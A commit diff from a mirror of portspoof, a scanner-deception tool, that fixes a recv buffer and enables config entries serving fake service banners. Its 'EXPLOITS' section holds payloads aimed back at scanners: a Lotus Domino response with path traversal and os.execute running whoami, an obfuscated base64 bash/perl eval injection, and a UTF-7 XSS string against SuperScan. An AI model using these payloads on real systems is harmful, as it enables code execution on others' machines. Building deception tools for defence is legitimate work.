sad/portspoof
1
0
Fork 0
mirror of https://github.com/drk1wi/portspoof.git synced 2024-06-28 09:41:36 +00:00
Code Issues Packages Projects Releases Wiki Activity

Fixed buffer len for recv

Browse Source
This commit is contained in:
Piotr Duszynski 2013-08-01 22:02:20 +02:00
parent 042ad01496
commit 600287f90f
2 changed files with 21 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
src/connection.cpp
View File

@ -69,7 +69,7 @@ void* process_connection(void *arg)
int tid = *((int*)(&arg));
//int len;
string str;
char buffer;
char buffer[1000];//TODO: to be fixed
int original_port=DEFAULT_PORT;
int n = 0;
time_t timestamp;
@ -79,7 +79,6 @@ void* process_connection(void *arg)
while(1) {
sleep(1);
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
{
@ -91,7 +90,7 @@ void* process_connection(void *arg)
if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
n = 1; // just reply...
else
n = recv(threads[tid].clients[i], &buffer,1, 0);
n = recv(threads[tid].clients[i], buffer,1, 0);
// deal with different recv buffer size

28
tools/portspoof.conf
View File

@ -75,23 +75,33 @@
#Example: port range
#51-60 "550 4m2v4 (FUZZ_HERE)"
51-60 "550 4m2v4 (FUZZ_HERE)"
#Example: Simple regular expression payloads
#8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
#8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
#8082 "word: ... \. \d \w \n"
8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
8082 "word: ... \. \d \w \n"
#Nmap regular expression matched payloads
#8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
#8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
#8102 "550 12345 FUZZ_HERE"
#8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
#8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
8102 "550 12345 FUZZ_HERE"
8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
## EXPLOITS ##
# NMAP
# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22 value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
#OS cmd injection payload for bash: $(cat output) and `cat output` injections
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
#McAffe SuperScan UTF7 XSS payload
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"